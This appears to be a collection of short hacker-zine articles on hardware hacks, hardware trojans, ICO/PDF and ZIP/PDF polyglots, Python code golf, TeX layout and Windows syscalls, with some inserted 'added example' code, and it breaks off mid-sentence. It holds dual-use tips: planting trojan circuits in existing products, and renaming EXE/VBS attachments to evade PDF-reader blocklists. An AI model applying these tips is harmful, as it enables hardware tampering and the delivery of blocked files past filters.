You'll learn about the infamous "Page Night" (that comes after the 8th page, and has the 0x0B identifier), and some ideas for more research.


Jokull Barkson 
w0zek ['vuzek], the motorized shopping cart


ingredients: 
- one shopping cart 
(gynvael wanted me to 
mention that you can buy 
one legally on ebay) 
- one hoverboard 
steps: 
1) disassemble hoverboard 
2) cut out hub motor brackets 
from chassis with bandsaw 
3) (optionally) square down the brackets on a mill
4) remove front wheels from 
cart 
5) cut down a 50mm flat bar to length 
and attach it to the front wheel 
mounts (likely with M12 bolts) 
6) drill 8mm holes in bar and attach 
hoverboard motor brackets 
7) mount a metal box on the bottom of the cart basket with zip-ties 
or another low-tech solution 
8) mount controller and battery in box 
9) fasten hub motors to brackets, run cables to control box (use 3- 
way electrical wiring for BLDC phases, CAT5 for hall sensors) 
10) flash the controller board with 
github.com/niklasfauth/hoverboard-firmware-hack 
11) attach controller to a thinkpad via UART and write python code 
that sends control packets 
12) wear a helmet 
13) try not to kill yourself 


see https://wiki.hackerspace.pl/projects:w0zek for more info, test drive footage and some control firmware code


q3k twitter.com/q3k 
Like a lot of people, you probably have or had a Wii, and like most people you like Guitar Hero, so you may have somewhere in your house an old Guitar Hero game and the guitar-shaped controller collecting dust.

If you have one, this article is made for you!

In this article, I'll explain how I hacked an old Guitar Hero controller in order to transform it into a minimalist musical instrument.

For that, we just need a Guitar Hero controller (thanks captain obvious), an Arduino Uno, some wires, a potentiometer, an electrodynamic loudspeaker, a resistor of 250 ohms and an NPN transistor (I used an S8050 D-331 for this project).


Before the fun part, there is a little bit of theory. 

Normally, our guitar is connected to a Wiimote (the principal Wii controller). Almost all Wiimote accessories are controlled thanks to an I2C bus.

An Inter-Integrated Circuit (I2C) bus allows data to be transmitted between two components over only 2 wires: the SDA wire for the data signal (to transport data) and the SCL wire for the clock signal (to synchronize).


Sooooo basically, we just have to get the states of the controller's buttons and play different notes 
depending on the button pressed. 

With an Arduino (as a master), we can easily communicate through an I2C bus with the controller (which acts as a slave, at the 7-bit address 0x52); for example this is a piece of code which begins the communication:

    Wire.begin();
    Wire.beginTransmission(0x52);
    Wire.write(0x40);
    Wire.write(0x00);
    Wire.endTransmission();

For this project, I wrote my own library to communicate with the guitar. All the sources of this project are available here: https://github.com/S01den/Real_Life_GuitarHero
Play with it as you wish.


To know the function of each wire on the controller's connector, I had to desolder it and I found this correspondence:

    WIRE       FUNCTION   PIN TO CONNECT ON ARDUINO
    BROWN      SDA        A4
    RED        GROUND     GND
    WHITE (1)  SCL        A5
    WHITE (2)  POWER      3V3

    (1): near the red wire   (2): near the blue wire


The guitar is now connected to the Arduino. To finish, you just need to add a potentiometer to control the sound power, and an electrodynamic speaker to emit music notes.

The music notes are generated by the tone function, called like this: tone(8, note_x[k], 250); where 8 is the pin where the speaker is connected, note_x[k] is the note played (x is A, B, D, E or G, the notes emitted by the guitar strings) with the octave k (modifiable by pressing the + and - buttons) and 250 is the duration (250 ms).

Just follow the scheme below (made with fritzing) and you should obtain something like that: 


S01den@protonmail.com
https://github.com/S01den


Hardware Trojans EXPLAINED!
In four simple examples!


Hardware trojans are features of a hardware component, hidden from the user, which can add, remove or modify the functionality of an electronic element, thereby reducing its reliability or creating a potential threat. A HW trojan consists of two building blocks: trigger and payload. The payload is a malicious modification of the circuit that changes the signal values. The trigger decides when to activate the payload.

So take a look at the figure on the left - the simplest circuit ever: a traditional NOT gate (aka. inverter) that just negates the value of the input signal.

[Figure: a NOT gate with its output signal 's'.]

In such a configuration, the attacker can only have one goal - to change the value of the 's' signal. However, he has a wide range of tools and methods at his disposal. So let's start with the simplest approach:


[Figure: the NOT gate with an AND gate (payload) controlled by the trigger signals 'p' and 'q'.]

In this scenario, the value of the AND gate (payload) changes the value of the 's' signal depending on the values of the 'p' & 'q' signals (trigger) that can be generated at any moment of the circuit's work. Who decides about the 'p' & 'q' values? These signals can be derived from other system components (e.g. sensors) or some external events (e.g. network monitor). In fact, you may even use the same signals that generate the original 's' input. Just take a look at the next figure:


Adam Kostrzewa 
SAA-ALL 0.0.5 


Such HW trojans are called combinationally 
triggered. But there are also other options available! 
The attacker can control when an attack will take 
place. This can be done by using a system clock or 
by counting incidents of selected operations. 


[Figure: sequential trigger feeding the payload.]


Such trojans, which are activated by a sequence of operations (in time) or after a period of time are called sequentially triggered. Finally, nobody prevents you from using both methods at once, i.e. a hybrid approach:

[Figure: hybrid trigger (sequential arming combined with combinational signals).]
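The three trigger styles above (combinational, sequential, hybrid) applied to the NOT gate, as an added example that is not part of the article: behavioural models in Python plus the two checks a verification engineer would run against the golden design, which make the detection difference concrete. A purely combinational trojan is caught by exhaustive comparison with the golden gate; the sequential one passes any functional test shorter than its counter threshold. The choice of "rising edges on the input" as the counted event is an assumption.

```python
# Added example (not from the article).  Signals are plain 0/1 integers.
import itertools

def golden_not(a):
    """The circuit as designed: s = NOT a."""
    return 1 - a

def combinational_trojan(a, p, q):
    """Trigger: p AND q. Payload: an AND gate that forces s low while the
    trigger is active; for every other value of p, q the gate behaves
    exactly like the golden NOT."""
    trigger = p & q
    return golden_not(a) & (1 - trigger)

class SequentialTrojan:
    """Trigger: a counter of selected operations (rising edges on the input
    here, standing in for a clock or event count). Payload: once the count
    reaches `threshold`, the output stays inverted."""
    def __init__(self, threshold):
        self.threshold, self.count, self.prev = threshold, 0, 0

    def _count_edge(self, a):
        if a == 1 and self.prev == 0:
            self.count += 1
        self.prev = a
        return self.count >= self.threshold      # "armed"

    def step(self, a):
        armed = self._count_edge(a)
        s = golden_not(a)
        return 1 - s if armed else s

class HybridTrojan(SequentialTrojan):
    """Both methods at once: the counter arms the trojan, p AND q fires the
    payload. Until armed, p and q have no effect at all."""
    def step(self, a, p, q):
        armed = self._count_edge(a)
        s = golden_not(a)
        return s & (1 - (p & q)) if armed else s

def exhaustive_mismatch(circuit, n_inputs):
    """Equivalence check against the golden NOT over every input vector (the
    first input is 'a'). Returns the first differing vector, or None. For a
    purely combinational trojan this always exposes the trigger condition."""
    for vec in itertools.product((0, 1), repeat=n_inputs):
        if circuit(*vec) != golden_not(vec[0]):
            return vec
    return None

def first_mismatch(dut, stimulus):
    """Drive a stateful circuit with a sequence of input tuples (a, ...) and
    return the index of the first cycle whose output differs from the golden
    NOT, or None when the test never reaches the trigger."""
    for i, vec in enumerate(stimulus):
        if dut.step(*vec) != golden_not(vec[0]):
            return i
    return None

if __name__ == '__main__':
    print('combinational, exhaustive check:', exhaustive_mismatch(combinational_trojan, 3))
    short = [(0,), (1,)] * 10                    # 20-cycle functional test
    print('sequential (threshold 1000), 20 cycles:', first_mismatch(SequentialTrojan(1000), short))
    print('sequential (threshold 1000), 2000 cycles:', first_mismatch(SequentialTrojan(1000), short * 100))
```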


Real Story: Even simple modifications, as already discussed, can be used to attack crypto engines. Below is a schematic representation of the attack:

[Figure: Plain Data In -> Crypto -> Encrypted Data Out; the original key is replaced by a compromised key (e.g. known bits).]


According to declassified documents from 2015, 
Crypto AG (Swiss manufacturer of cryptographic 
hardware), in cooperation with NSA, has 
introduced compromised HW to some of its 
customers. The complete list is still classified, but 
it is known that HW was used to spy on Iran and 
Libya, for example. Modifications were made in 
the form of hardware trojans / backdoors, which 
weaken the cryptographic protection at the 
request of the authority (as shown in the above 
figure). For many years, history was discredited as 
a conspiracy theory. 

More : https://en.wikipedia.org/wiki/Crypto_AG 


As you see it is not that difficult! Indeed, you may 

create some of these circuits “at home” (even using 
discrete elements) and later apply them to existing 
products - of course for fun and profit! ;) 


https://adamkostrzewa.github.io/ 


https://twitter.com/systemWbudowany 


A guide to ICO/PDF polyglot files


In this article we are going to demonstrate how to 
create a polyglot file that is a valid ICO image as well 
as a valid PDF document. 

These two file formats have a couple of interesting 
properties that make this endeavour possible. 

ICO is a container format for files that can contain one 
or more BMP or PNG images. An ICO file is defined 
by a 6 byte header that contains some magic bytes and 
the number of images in the file. This is followed by a 
16 byte header each for every one of the images which 
among other data contains the offset and size of the 
actual image data. 

While it is common practice to have the image data 
start immediately after the headers this is not strictly 
required. Any data that is not located inside one of the 
image data areas specified in the header is ignored. 

The PDF file format is specified in ISO 32000. This specification requires PDF files to start with the magic byte sequence %PDF. This requirement collides with the ICO header. Fortunately practically all PDF libraries and applications implement the Adobe supplement to ISO 32000 which only requires the magic bytes to be present in the first 1024 bytes of a document. This gives us enough room to fit an ICO header with up to 63 sub-images before the PDF data.

Additionally there are several ways to include non- 
visible binary data in a PDF file. This is where we are 
going to put our image data. In this particular example 
the data will be placed into stream objects which have 
the following format: 


OBJECT_ID 0 obj
<<
/Length LENGTH_OF_DATA
>>
stream
IMG_DATA
endstream
endobj


Where OBJECT_ID is a unique numerical id,
LENGTH_OF_DATA is the number of bytes of data
in the stream and IMG_DATA will be our image data.

Armed with this knowledge about the file formats and
an idea how to interleave them we can start to create a
file that is a valid ICO as well as a valid PDF from two
existing files.

First we need to determine the number of images in
the ICO file from bytes 5 and 6 of its header so we can
copy all the headers to our output file.


img_count = struct.unpack('<HHH', icofile.read(6))[2]

icofile.seek(0, 0)
outfile.write(icofile.read(6))

for i in range(img_count):
    outfile.write(icofile.read(16))


As long as the source file contains less than 64 images
we are at this point still comfortably within the first
1024 bytes of the output file and can simply append the
bulk of our PDF file up to and including its last stream
object.


outfile.write(pdffile.read(OFFSETLASTSTREAM))


After this we extract the image data from our input
ICO and append them as additional stream objects with
suitable, unique object ids.


OBJSTREAM_HEAD = """{} 0 obj <<
/Length {}
>>
stream
"""
OBJSTREAM_TAIL = """endstream
endobj
"""

# ico_data holds one (size, offset) pair per image, taken
# from bytes 8-15 of its 16 byte directory entry
for i in ico_data:
    outfile.write(OBJSTREAM_HEAD.format(
        obj_id, i[0]).encode('utf-8'))
    icofile.seek(i[1], 0)
    ico_offsets.append(outfile.tell())
    outfile.write(icofile.read(i[0]))
    outfile.write(OBJSTREAM_TAIL.encode('utf-8'))
    obj_id += 1


At the end of the output file we can then simply append
the rest of our source PDF.


pdffile.seek(OFFSETLASTSTREAM, 0)
outfile.write(pdffile.read())


The last thing that remains to do now is to fix the
offsets of the image chunks in the ICO header. Since we
saved the offsets when appending them to our output
file this is easily accomplished.


outfile.seek(18, 0)   # offset field of the first entry (6 + 12)

for i in ico_offsets:
    outfile.write(struct.pack('<I', i))
    outfile.seek(12, 1)   # skip to the offset field of the next entry


Now we are in possession of an ICO-PDF polyglot file
that we can put to good use by e.g.:

- embedding a CV/job posting into the favicon of our
  website to challenge recruiters/job seekers

- putting a manual for its easter eggs into the desktop
  icon of our application


A Python implementation of the process described
above including example data and ready made polyglot
files can be found at https://github.com/tickelton/ico-
pdf.


Structuring the PDF data in a way that the images
are embedded not as raw streams but as attachments
that are also visible in the PDF document is left as an
exercise to the reader.


https://twitter.com/tickelton
https://tickelton.gitlab.io/


tick 
PNG Themed Python Code Golf


0x00 INTRODUCTION 


Back in May 2019, Gynvael Coldwind organized a code golf competition[0x00] where you could win a ticket for CONFidence[0x01], an international IT security conference. Actually, there were 3 competitions for 3 technologies: C++, JavaScript and Python 3, but I'll focus on the last one. The goal was to write a program that generates a valid PNG file named confidence.png with pixel values exactly matching a specified model image. Entries were run on an offline install of Ubuntu Server 19.04 using the python confidence.py command. Also there was a 60 seconds execution time limit. Darn! No brute-forcing. The smallest confidence.py file wins! Accidentally, I've managed to win[0x02] with a 1133 bytes solution but let's do better! Shall we?


0x01 THE IMAGE 
The model image[0x03] was a 11746 bytes sized file:


The first step is to make the image as small as possible while preserving pixel values. After a quick analysis: it's completely opaque and uses only 8 unique colors. The PNG file contains some metadata we can strip. Also you might notice that the image is made of solid 20 x 20 pixel blocks. You can scale it up and down by a factor of 20 losslessly (using no interpolation). Sadly, the default Python 3 installation doesn't include any image processing library, so let's abandon this approach. Using GIMP to remove metadata, alpha channel and to convert the image to indexed mode gets us a 4283 bytes PNG file! Then we can use a PNG optimizer like optipng or pngcrush to get even lower, but zopfli[0x04] is the real overkill: that gets us as low as 2428 bytes! For some web browsers and other apps, the first 2408 bytes would be enough to display such a damaged PNG file. But since we need a correct PNG file, we probably can't get below 2428 bytes while preserving pixel values. Prove me wrong :)


0x00 https://gynvael.coldwind.pl/?id=710

0x01 https://confidence-conference.org/2019/krakow.html

0x02 https://gynvael.coldwind.pl/?id=711

0x03 https://gynvael.coldwind.pl/img/confidence_2019_golf.png

0x04 https://github.com/google/zopfli


blamedrop 


Public Domain 


0x02 THE SCRIPT 

So far, we've optimized the PNG as much as we could. Now, what about squeezing it up even further by applying general purpose compression? We could use Python's methods, but zopfli wins again with a raw deflate stream. To decompress it in Python we need to use zlib.decompress with wbits=-8 as additional argument.

Method                    Bytes
bz2.compress              950
lzma.compress             768
gzip.compress             732
zlib.compress             722
zlib.compress(level=9)    720
zopfli --deflate          710

Now, what about putting these 710 bytes of binary data into a Python script? We would need a whole 2009 bytes to embed it as a bytes literal. The first thing that comes to mind is Base64! But wait! The base64 module also supports Base85 encoding. With a larger character set it is more efficient. It is a code golf after all, every byte counts!

Method       len()   len(repr())
b64encode    948     951
a85encode    888     915
b85encode    888     891

Putting this all together gives...


import zlib,base64 as b;open('confidence.png','wb'). 
write(zlib.decompress(b.b85decode( '>kRO7=jD>(Vqjq4_4 
THFVqjozU | ?XeU| |M|Nd3K2QHh=Wd_r7-bSx7~4>Q~U|Nj@Wupez~y4cvfuASLVZp&aW=2 
20cT7srqa#y58yCq8LzX?Pee! gk9*=LnP7F (Bd=3*#0 ‘ QWX2fGIVOexNm|C-+uQsdM-Eq 
8eUw*$Ug_Z5J94bE&77_?*v#6TxaFSkPt8cVTA;T10dYc; OVNWjLb}IAj| 2(z;Y+ZSCXI 
PsQ6MItfU! ; !AHXYKxPrI2yPi+MYruO<}n~Ef+)ad5@AIU1*9qg>97*OWLO2?TQM*x*qFY 
@rgq{6=JpT77Or (3%| -B&9! xp(w##q_&@FaMTUO8odhRJa*hh ‘ MuTqsfu8SN4is*%q° tW6 
cMh%b ) hHkSU ‘Os * hmO“Eb=yX6xGB{PR$qxZp}q3+rCn7BOr0e81Cly_Ov+S@ZAnRMoKEW 
$SzSD_2#1{SEqZ#7tD ‘NLU8T88&av Lo@@YGsLcPUEef$* | R5ee_LnGPM@;%-BwKt7NX)V 
p4WIz&t9)M>7>k6{>N8& > |W* | *=iY500<_c  MkNr#TK*v6*FnMHMR#06#cgSyz; @?vbYB 
<Z1xMOn(*| ?d2Sq(u?) *S<zu9BI)Ct&$8-6TU!2°0?;09=8{VVML | P*#o0d0qzlo_jRU2< 
Ra=61L}QpQc%_exKO)e7@-4x%Fo120u7?ku* ouf*46j_Mvtj>kB+&S ) | wce(NbI*RQo- ?q 
3!0zFwiFPO*FU! }WmSCShyhLj9SEOYK | t-~IpdQ+ABpo? | jHN%}M{T* 5mc7bewB jymWcU 
fR1WeDCTTQ-x98MZOUG- ‘v{PeY@WkYu0O3mOGDILtgn?I4w!*+)rdG! sByt6fsZ_{M*LP 
ZUka9 | 5“L~W2ieZd1S=8Jghz&<1lYO~c)I$ztaDOeOss'),-8)) 


...a working solution that is only 982 bytes! You can count them all ;) Notice the import statement and the lack of b before the encoded data string. Remember that many text editors add an additional new line character to saved files. Get rid of it! It's a whole 8 bits, 8 bits too many for a code golf competition...


0x03 GOING FULL BINARY! 


What about skipping b85encode and embedding raw binary compressed data in the script? Wait. That's illegal!


#coding=l1
import zlib;open('confidence.png','wb').write(zlib.decompress(open(__file__,'rb').read()[111:],-8))#


Yes, after # goes the binary zopfli output (l1 is the latin-1 alias, and the script text up to and including that # is exactly 111 bytes). Not included here due to LaTeX complaining... This makes an 821 bytes solution. A certainly dirty but working solution! So, this works for some binary data and some encodings. If you do really want to use this trick, for whatever reason, you can just go brute-force and generate files with all the encodings from encodings.aliases.aliases.keys() and your binary data, then try running them. Pick the smallest working one.
And remember... Do try this at home!
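To reproduce the two measurements above on your own data, the following added example (not the author's script) compresses a constructed PNG-like byte string as a raw deflate stream, compares what each base64-module encoding costs once pasted into a script as a literal, and then generates and executes the same kind of one-liner. `raw_deflate`, `literal_costs`, `golf_script` and `roundtrip` are names chosen here, and zlib level 9 stands in for zopfli.

```python
import base64
import os
import tempfile
import zlib


def raw_deflate(data: bytes, level: int = 9) -> bytes:
    """Raw deflate stream (no zlib header, no adler32 trailer), the same
    container zopfli --deflate produces; zlib only gets as far as its level 9."""
    comp = zlib.compressobj(level, zlib.DEFLATED, -15)
    return comp.compress(data) + comp.flush()


def literal_costs(blob: bytes) -> dict:
    """Source bytes each text encoding costs as a str literal in the script:
    len(repr()) counts the quotes plus any backslash escapes the literal needs
    (the Base85 alphabet contains no quote or backslash, Ascii85 does)."""
    encoders = {"b64encode": base64.b64encode,
                "a85encode": base64.a85encode,
                "b85encode": base64.b85encode}
    return {name: len(repr(enc(blob).decode("ascii"))) for name, enc in encoders.items()}


def golf_script(data: bytes, out_name: str) -> str:
    """Assemble the one-liner from the article around freshly compressed data.
    wbits=-8 (two characters shorter than -15) is enough for a one-shot
    decompress: the output buffer already holds every back-reference target,
    so the 256-byte window implied by 8 is never consulted."""
    literal = repr(base64.b85encode(raw_deflate(data)).decode("ascii"))
    return ("import zlib,base64 as b;open(%r,'wb').write("
            "zlib.decompress(b.b85decode(%s),-8))" % (out_name, literal))


def roundtrip(data: bytes) -> bool:
    """Run the generated script in a scratch directory and compare its output."""
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "confidence.png")
        exec(golf_script(data, target), {})
        with open(target, "rb") as fh:
            return fh.read() == data


# Constructed stand-in for the optimized PNG: signature plus repetitive
# chunk-like data, so both the deflate and the encoding ratios are vis.
SAMPLE = b"\x89PNG\r\n\x1a\n" + bytes(range(256)) * 8 + b"IEND"

if __name__ == "__main__":
    blob = raw_deflate(SAMPLE)
    print(len(SAMPLE), len(blob), literal_costs(blob))
    print(len(golf_script(SAMPLE, "confidence.png")), roundtrip(SAMPLE))
```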


Community Advertisement

[Screenshot: the Cutter user interface, graph view and disassembly of a small x86 binary's main function]

Free and Open Source RE Platform powered by radare2

Cutter is a Qt and C++ GUI for radare2. Its goal is to be an advanced, free, open-source, and easy-to-use reverse engineering platform.

CALL FOR CONTRIBUTORS.

cutter.re
Telegram: t.me/r2cutter
Twitter: @r2gui


Adding any external data
to any PDF

Attaching

[Screenshot: the reader's attachment panel listing hello.zip]

To attach a file to a PDF, you can rely on free
tools out there:

pdftk doc.pdf attach_files myfile.bin output attached.pdf

Note that Adobe Reader refuses to download
EXE, VBS or ZIP attachments, so you might want to
rename their extensions.

When attaching such files, the entire PDF is
recreated, so you can't revert to the original doc.


Incremental updates 

A more elegant way to attach a file is to do it via 
an incremental update, so that you make it clear 
that the file was attached afterwards: the content 
of the original file body is unmodified, only the 
updating elements will be appended: an XREF 
update, a new catalog that references the 
attachment, the attachment declaration and its 
data stream. 


import fitz  # from PyMuPDF
doc = fitz.open(pdf)
# create an attachment
# modify the extension to bypass blacklisting
doc.embeddedFileAdd(name, data, name, name + "_")
# save incrementally
doc.saveIncr()
This script may look really simple, but it will 
handle for you complex cases such as 
linearization, object streams or classic xrefs, will 
only append new or updated objects and leave 
the original file body intact, and will give back a 
perfectly valid PDF file. 
That said, if you attach a ZIP to a PDF, you 
could think of making it a ZIP/PDF polyglot. 


Incompatibilities with polyglots 
But these are mutually exclusive: even if you 
store the incremental update with no 
compression via: 
doc.save(doc.name, incremental=True, expand=255),


some incompatibilities will remain. 


angealbertini 
http://github.com/corkami/ 
Absolute offsets

To be perfectly compatible (for example with 7z 
or Windows Explorer), a ZIP needs its offsets to 
be re-adjusted so that they are absolute to the 
file, not relative to the start of the archive. This 
can be fixed in place with the Info-ZIP zip -F 
command. 

But then when you extract the ZIP as a PDF 
attachment, its offsets will be incorrect again, as 
only the attachment will be copied out of the file. 


Embedding by hand 
So you may want to drop the attachment 
functionality altogether, and just embed the file 
as a single data stream instead: 
# create a dummy object entry
objNb = doc._getNewXref()
doc._updateObject(objNb, '<<>>')
# add contents of the archive
doc._updateStream(objNb, zipdata, new=True)


Appended data 

Some tools will still complain that there is 
appended data after the archive when you read 
it from the polyglot. A workaround is to extend 
the archive comment to the end of the file once 
it's in the polyglot: 


import struct

# locating the comment length in the ZIP's EOCD
# 4:Sig 2:NbDisk 2:NbCD 2:TotalDisk 2:TotalCD
# 4:CDSize 4:Offset 2:ComLen
offset = filedata.rfind(b"PK\5\6") + 20

# new comment length
length = len(filedata) - offset - 2

with open(pdf, "wb") as f:
    f.write(filedata[:offset])
    f.write(struct.pack("<H", length))
    f.write(filedata[offset+2:])


To keep archive viewers from showing an archive
comment that is now full of PDF keywords, a
working trick is to start the comment with a null
byte: just append such a byte to the ZIP when
adding it to the PDF document.
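The two repairs from the "Absolute offsets" and "Appended data" sections, done in pure Python as an added example (not the author's PyMuPDF snippets): `embed_zip` places a constructed archive between a constructed PDF-like prefix and trailer, rewrites the archive's offsets to be absolute and stretches the EOCD comment over the trailer, and `read_back` shows what a ZIP parser then sees. All names and sample data are chosen here.

```python
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"   # end of central directory record
CDIR_SIG = b"PK\x01\x02"   # central directory file header


def build_sample_zip() -> bytes:
    """Constructed archive with one member; its comment is a single null byte
    so that, once the comment is stretched over the PDF tail, viewers show nothing."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("hello.txt", "hello from inside the PDF\n")
        zf.comment = b"\x00"
    return buf.getvalue()


def embed_zip(prefix: bytes, archive: bytes, suffix: bytes) -> bytes:
    """Place the archive between prefix and suffix, then repair it in place:
    (1) make the central directory and local header offsets absolute, as
    `zip -F` does, and (2) set the EOCD comment length so that the suffix is
    read as archive comment instead of trailing garbage."""
    data = bytearray(prefix + archive + suffix)
    base = len(prefix)                        # every archive offset moved by this much
    eocd = data.rfind(EOCD_SIG)
    # EOCD: 4:Sig 2:NbDisk 2:NbCD 2:TotalDisk 2:TotalCD 4:CDSize 4:Offset 2:ComLen
    cd_size, cd_off = struct.unpack_from("<II", data, eocd + 12)
    cd_off += base
    struct.pack_into("<I", data, eocd + 16, cd_off)
    pos = cd_off
    while pos < cd_off + cd_size:             # walk the central directory entries
        if data[pos:pos + 4] != CDIR_SIG:
            raise ValueError("central directory damaged at %d" % pos)
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", data, pos + 28)
        local_off = struct.unpack_from("<I", data, pos + 42)[0] + base
        struct.pack_into("<I", data, pos + 42, local_off)
        pos += 46 + name_len + extra_len + comment_len
    tail_len = len(data) - (eocd + 22)        # everything after the EOCD record
    if tail_len > 0xFFFF:
        raise ValueError("tail too long for a ZIP comment (%d bytes)" % tail_len)
    struct.pack_into("<H", data, eocd + 20, tail_len)
    return bytes(data)


def read_back(poly: bytes) -> dict:
    """What a ZIP parser sees in the polyglot: members, content, the comment,
    and whether the EOCD's central directory offset is absolute to the file."""
    zf = zipfile.ZipFile(io.BytesIO(poly))
    eocd = poly.rfind(EOCD_SIG)
    cd_off = struct.unpack_from("<I", poly, eocd + 16)[0]
    return {
        "names": zf.namelist(),
        "hello": zf.read("hello.txt"),
        "comment": zf.comment,
        "cd_absolute": poly[cd_off:cd_off + 4] == CDIR_SIG,
    }


def make_sample_polyglot():
    """Constructed PDF-like wrapper: the archive becomes the body of a stream
    object, and the trailer after it is what archive tools flag as appended data."""
    archive = build_sample_zip()
    prefix = (b"%PDF-1.4\n1 0 obj << /Type /Catalog >>\nendobj\n"
              b"2 0 obj << /Length " + str(len(archive)).encode() + b" >>\nstream\n")
    suffix = b"\nendstream\nendobj\ntrailer << /Root 1 0 R >>\n%%EOF\n"
    return embed_zip(prefix, archive, suffix), suffix


if __name__ == "__main__":
    poly, suffix = make_sample_polyglot()
    print(read_back(poly))
```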


Conclusion 

Attaching a file via an incremental update is an 
elegant way to extend a document while 
preserving its original structure. 

But a ZIP file can't be at the same time attached 
to a PDF doc and referenced externally as a 
ZIP/PDF polyglot. 


Ange Albertini with the help of 
Nicolas Grégoire, Gynvael Coldwind and 
Philippe Teuwen. 


Ange Albertini 
The TeXnicalities of Paper Folding


Three years ago, I experimented with a folding puzzle in PoC||GTFO issue 0x11. The editors and I eventually decided to scrap the puzzle because it distracted from the underlying content of the article in which it was to be inserted. The idea did eventually inspire my paper airplane puzzle from page 21 of PoC||GTFO 0x13:02, but the implementation of the paper airplane was much simpler; a straightforward exercise in TikZ.

The original puzzle, as is demonstrated on this page, was much more TeXnical. It's one thing to draw some fold lines on a page, but it's much more difficult to typeset text that seamlessly and cleanly spans across a fold break. I wanted to benefit from the beautiful TeX line breaking algorithm discovered by Michael Plass in his Ph.D. with Donald Knuth.

The naive approach would be to simply typeset all of the text separately, manually slice the PDF using an image manipulation program, and then embed it back in the proper layout. However, this requires manual processing, and has the potential to break features like copy/paste and vector graphics.

A more seasoned TeXnician might choose to use a package like shapepar.sty to create whitespace in the middle, into which the center column could be inserted. However, this will treat the negative space of the inner column as a line break, causing TeX to either add whitespace or hyphenate words. Paragraph manipulation will not allow individual words to span the folds, as will happen with long words like "sesquipedalianism."

The TeXnique at which I arrived was to use a combination of \newsavebox and TikZ clipping. Here is a minimal example.

First, we create a box containing a minipage containing the entire content of the outer two columns:

\newsavebox{\foldedcontent}%
\savebox{\foldedcontent}{%
  \begin{minipage}{0.5\foldedwidth}
    This will be the content that
    is in the outer columns.
  \end{minipage}%
}

Next, create the two outer columns using TikZ's clipping feature, and distribute them horizontally using \hfill:

\noindent\begin{tikzpicture}[remember picture]
  \clip[use as bounding box] (0,0) rectangle
    (0.5\wd\foldedcontent,-\foldedheight);
  \node[anchor=north] at
    (0.5\wd\foldedcontent,0) (leftfold)
    {\usebox{\foldedcontent}};
\end{tikzpicture}\hfill%
\begin{tikzpicture}[remember picture]
  \clip[use as bounding box] (0,0) rectangle
    (0.5\wd\foldedcontent,-\foldedheight);
  \node[anchor=north] at (0,0) (rightfold)
    {\usebox{\foldedcontent}};
\end{tikzpicture}

The "[remember picture]" option is so that the coordinates of the named nodes (i.e., "leftfold" and "rightfold") can be referenced from other pictures. We will use this next. The columns are differentiated by placing the nodes at different locations relative to the clipping rectangle.

Thus far we have two outer columns with whitespace in between. The final step is to use TikZ's "overlay" feature to overlay a minipage containing the middle content inside of the whitespace:

\begin{tikzpicture}[remember picture, overlay]
  \node[anchor=north] at ($(leftfold.north east)
      !0.5!(rightfold.north west)$) {
    \begin{minipage}[b]{0.46\wd\foldedcontent}
      This will be the content in the center.
    \end{minipage}};
\end{tikzpicture}


https://www.sultanik.com/ 
https://twitter.com/ESultanik 
https://github.com/ESultanik 


Evan Sultanik 
Windows Syscall Quiz


by Mateusz Jurczyk (j00ru) 


Do you consider yourself a Windows internals expert?
If you do, then try to correctly answer the following
questions. If not, feel free to follow along and hopefully
learn some interesting facts about the kernel of the
most popular desktop operating system in the world.


The quiz: 


1. How many syscalls do Windows NT 4.0 and Win- 
dows 10 1903 have, i.e. how much has the system 
call table grown in the 23 years between 1996-2019? 


2. Are there differences in the syscall interfaces be- 
tween various editions of the same versions of Win- 
dows? 


3. Has any legitimate driver ever registered its own
syscall table(s) beyond the standard ntoskrnl.exe
and win32k.sys?


Ready? Let’s see how you did! 


Question 1: syscall table growth 


The first release of Windows NT 4.0 Workstation had 
210 core system calls and 496 graphical ones, adding up 
to a total of 706. At the time of this writing, the latest 
32-bit build of Windows 10 declares 464 + 1256 = 1720 
syscalls: 


[Bar chart: number of syscalls in ntoskrnl.exe and in win32k.sys, Windows NT 4.0 vs Windows 10 19H1, y axis 0-1250]


This is a 143% increase in the size of the interface, 
which is an attack surface available to locally running 
code. In other words, a new system call has been 
added on average every week for the past two decades. 
Of course it is not a fully precise metric as it doesn’t ac- 
count for code hidden behind the win32k!NtUserCall 
family, IOCTLs and many other factors, but it does il- 
lustrate the growth of the kernel complexity over time. 
Fortunately, starting with Windows 8 developers can re- 
strict access to parts of the attack surface for their sand- 
boxed processes, thanks to new features such as the sys- 
tem call disable policy[1].


[1] https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-process_mitigation_system_call_disable_policy


Blog: https://j00ru.vexillium.org/
Twitter: https://twitter.com/j00ru
GitHub: https://github.com/j00ru


Windows Syscall Quiz 


Question 2: cross-edition differences 


As a general rule, various editions of the same OS 
(Home, Pro, Enterprise etc.) use the same underly- 
ing kernel and thus share the same set of system calls. 
However, there is one notable exception. In May 2019, 
I noticed that in the syscall tables served on my blog, 
there were a few names only present in Windows NT 
4.0 SP4, but not in SP3, SP5, or any other system. One 
such symbol was NtCreateWinStation: 


Windows NT

System Call Symbol   | SP3    | SP4    | SP5    | SP6
NtCreateToken        | 0x0026 | 0x0026 | 0x0026 | 0x0026
NtCreateWinStation   |        | 0x00d3 |        |
NtDelayExecution     | 0x0027 | 0x0027 | 0x0027 | 0x0027


After a brief evening research with Gynvael Coldwind, 
we figured out that these syscalls (5 of them in total) 
were only found in the Terminal Server Edition of Win- 
dows NT, released two years after Workstation. Consid- 
ering that the data came from the original table created 
by skape and hosted by Metasploit, the list for SP4 must 
have been extracted from a TS version of the system, un- 
like for other service packs, and so it has stayed this way 
up until recently. And so the riddle was solved. 


Question 3: non-standard syscall tables 


In that same evening, we decided to finally establish if 
there ever had been real syscalls with IDs above 0x2000, 
i.e. registered in the SSDT by a non-standard driver. 
We had heard rumors about IIS doing it at some point 
in time, but we had never observed it in real life. 

Very quickly, we found several online sources confirm- 
ing that story for IIS4 and IIS5, on Windows NT—2000. 
Some of them pointed us to a driver called SPUD.sys, 
which stands for Special Purpose Utility Driver (if you 
find that name funny, check the story behind afd.sys). 
We found the driver on an extra Option Pack CD for 
Windows NT, and on the standard installation disk of 
Windows 2000. This way, we confirmed that it indeed 
called KeAddSystemServiceTable with 9 entries in IIS4 
and 7 entries in IIS5. We also learned that the associ- 
